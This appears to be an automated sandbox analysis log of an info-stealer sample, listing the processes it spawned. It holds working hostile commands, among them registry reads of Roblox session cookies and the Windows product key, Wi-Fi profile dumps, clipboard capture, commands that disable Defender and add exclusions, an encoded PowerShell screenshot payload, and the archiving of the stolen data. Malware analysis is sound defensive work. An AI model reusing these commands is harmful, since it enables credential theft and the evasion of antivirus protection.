              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIAJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"Jump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"Jump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c "getmac"Jump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"Jump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"Jump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"Jump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"Jump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"Jump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"Jump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"Jump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"Jump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeProcess created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic path win32_VideoController get nameJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c "wmic os get Caption"Jump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"Jump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"Jump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"Jump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"Jump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\KpHYfxnJs6.exe'Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSendJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\mshta.exe mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('VERISON NOT SUPPORT (WAIT FOR UPDATE)', 0, 'CLOSING ALL APPS FOR BOTNET', 0+16);close()"Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist /FO LISTJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic csproduct get uuid
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic path win32_VideoController get name
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic path win32_VideoController get name
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\attrib.exe attrib +h +s "C:\Users\user\Desktop\KpHYfxnJs6.exe"
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ??.scr'
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist /FO LIST
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist /FO LIST
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wbem\WMIC.exe WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell Get-Clipboard
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist /FO LIST
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tree.com tree /A /F
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\systeminfo.exe systeminfo
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profile
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIAB
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\bifucm0t\bifucm0t.cmdline"
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tree.com tree /A /F
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\attrib.exe attrib -r C:\Windows\System32\drivers\etc\hosts
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESED03.tmp" "c:\Users\user\AppData\Local\Temp\bifucm0t\CSCB2EB15F711B84CFFA3556DECAB136738.TMP"
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\getmac.exe getmac
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tree.com tree /A /F
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\attrib.exe attrib +r C:\Windows\System32\drivers\etc\hosts
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist /FO LIST
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tree.com tree /A /F
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tree.com tree /A /F
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tree.com tree /A /F
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\_MEI73202\rar.exe C:\Users\user\AppData\Local\Temp\_MEI73202\rar.exe a -r -hp"grabber" "C:\Users\user\AppData\Local\Temp\CoY55.zip" *
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic os get Caption
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic computersystem get totalphysicalmemory
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic csproduct get uuid
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic path win32_VideoController get name
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping localhost -n 3
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeProcess created: C:\Windows\SysWOW64\cmd.exe c:\windows\system32\cmd.exe /c "powershell set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversend && powershell set-mppreference -submitsamplesconsent 2 & "%programfiles%\windows defender\mpcmdrun.exe" -removedefinitions -all"
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversend
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeProcess created: C:\Windows\SysWOW64\cmd.exe c:\windows\system32\cmd.exe /c "powershell.exe -noprofile -executionpolicy bypass -encodedcommand jabzag8adqbyagmazqagad0aiabaaciadqakahuacwbpag4azwagafmaeqbzahqazqbtadsadqakahuacwbpag4azwagafmaeqbzahqazqbtac4aqwbvagwabablagmadabpag8abgbzac4arwblag4azqbyagkaywa7aa0acgb1ahmaaqbuagcaiabtahkacwb0aguabqauaeqacgbhahcaaqbuagcaowanaaoadqbzagkabgbnacaauwb5ahmadablag0algbxagkabgbkag8adwbzac4argbvahiabqbzadsadqakaa0acgbwahuaygbsagkaywagagmababhahmacwagafmaywbyaguazqbuahmaaabvahqadqakahsadqakacaaiaagacaacab1agiababpagmaiabzahqayqb0agkaywagaewaaqbzahqapabcagkadabtageacaa+acaaqwbhahaadab1ahiazqbtagmacgblaguabgbzacgakqanaaoaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaadgbhahiaiabyaguacwb1agwadabzacaapqagag4azqb3acaatabpahmadaa8aeiaaqb0ag0ayqbwad4akaapadsadqakacaaiaagacaaiaagacaaiab2ageacgagageababsafmaywbyaguazqbuahmaiaa9acaauwbjahiazqblag4algbbagwababtagmacgblaguabgbzadsadqakaa0acgagacaaiaagacaaiaagacaazgbvahiazqbhagmaaaagacgauwbjahiazqblag4aiabzagmacgblaguabgagagkabgagageababsafmaywbyaguazqbuahmakqanaaoaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagahqacgb5aa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagafiazqbjahqayqbuagcabablacaaygbvahuabgbkahmaiaa9acaacwbjahiazqblag4algbcag8adqbuagqacwa7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahuacwbpag4azwagacgaqgbpahqabqbhahaaiabiagkadabtageacaagad0aiabuaguadwagaeiaaqb0ag0ayqbwacgaygbvahuabgbkahmalgbxagkazab0aggalaagagiabwb1ag4azabzac4asablagkazwboahqakqapaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiab1ahmaaqbuagcaiaaoaecacgbhahaaaabpagmacwagagcacgbhahaaaabpagmacwagad0aiabhahiayqbwaggaaqbjahmalgbgahiabwbtaekabqbhagcazqaoagiaaqb0ag0ayqbwackakqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagagcacgbhahaaaabpagmacwauaemabwbwahkargbyag8abqbtagmacgblaguabgaoag4azqb3acaauabvagkabgb0acgaygbvahuabgbkahmalgbmaguazgb0acwaiabiag8adqbuagqacwauafqabwbwackalaagafaabwbpag4adaauaeuabqbwahqaeqasacaaygbvahuabgbkahmalgbtagkaegblackaowanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaacgblahmadqbsahqacwauaeeazabkacgakabcagkadabtageacaapagiaaqb0ag0ayqbwac4aqwbsag8abgblacgakqapadsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaywbhahqaywboacaakabfahgaywblahaadabpag8abgapaa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagac8alwagaegayqbuagqabablacaayqbuahkaiablahgaywblahaadabpag8abgbzacaaaablahiazqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaacgblahqadqbyag4aiabyaguacwb1agwadabzadsadqakacaaiaagacaafqanaaoafqanaaoaigbaaa0acganaaoaqqbkagqalqbuahkacablacaalqbuahkacablaeqazqbmagkabgbpahqaaqbvag4aiaakahmabwb1ahiaywblacaalqbsaguazgblahiazqbuagmazqbkaeeacwbzaguabqbiagwaaqblahmaia
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -noprofile -executionpolicy bypass -encodedcommand jabzag8adqbyagmazqagad0aiabaaciadqakahuacwbpag4azwagafmaeqbzahqazqbtadsadqakahuacwbpag4azwagafmaeqbzahqazqbtac4aqwbvagwabablagmadabpag8abgbzac4arwblag4azqbyagkaywa7aa0acgb1ahmaaqbuagcaiabtahkacwb0aguabqauaeqacgbhahcaaqbuagcaowanaaoadqbzagkabgbnacaauwb5ahmadablag0algbxagkabgbkag8adwbzac4argbvahiabqbzadsadqakaa0acgbwahuaygbsagkaywagagmababhahmacwagafmaywbyaguazqbuahmaaabvahqadqakahsadqakacaaiaagacaacab1agiababpagmaiabzahqayqb0agkaywagaewaaqbzahqapabcagkadabtageacaa+acaaqwbhahaadab1ahiazqbtagmacgblaguabgbzacgakqanaaoaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaadgbhahiaiabyaguacwb1agwadabzacaapqagag4azqb3acaatabpahmadaa8aeiaaqb0ag0ayqbwad4akaapadsadqakacaaiaagacaaiaagacaaiab2ageacgagageababsafmaywbyaguazqbuahmaiaa9acaauwbjahiazqblag4algbbagwababtagmacgblaguabgbzadsadqakaa0acgagacaaiaagacaaiaagacaazgbvahiazqbhagmaaaagacgauwbjahiazqblag4aiabzagmacgblaguabgagagkabgagageababsafmaywbyaguazqbuahmakqanaaoaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagahqacgb5aa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagafiazqbjahqayqbuagcabablacaaygbvahuabgbkahmaiaa9acaacwbjahiazqblag4algbcag8adqbuagqacwa7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahuacwbpag4azwagacgaqgbpahqabqbhahaaiabiagkadabtageacaagad0aiabuaguadwagaeiaaqb0ag0ayqbwacgaygbvahuabgbkahmalgbxagkazab0aggalaagagiabwb1ag4azabzac4asablagkazwboahqakqapaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiab1ahmaaq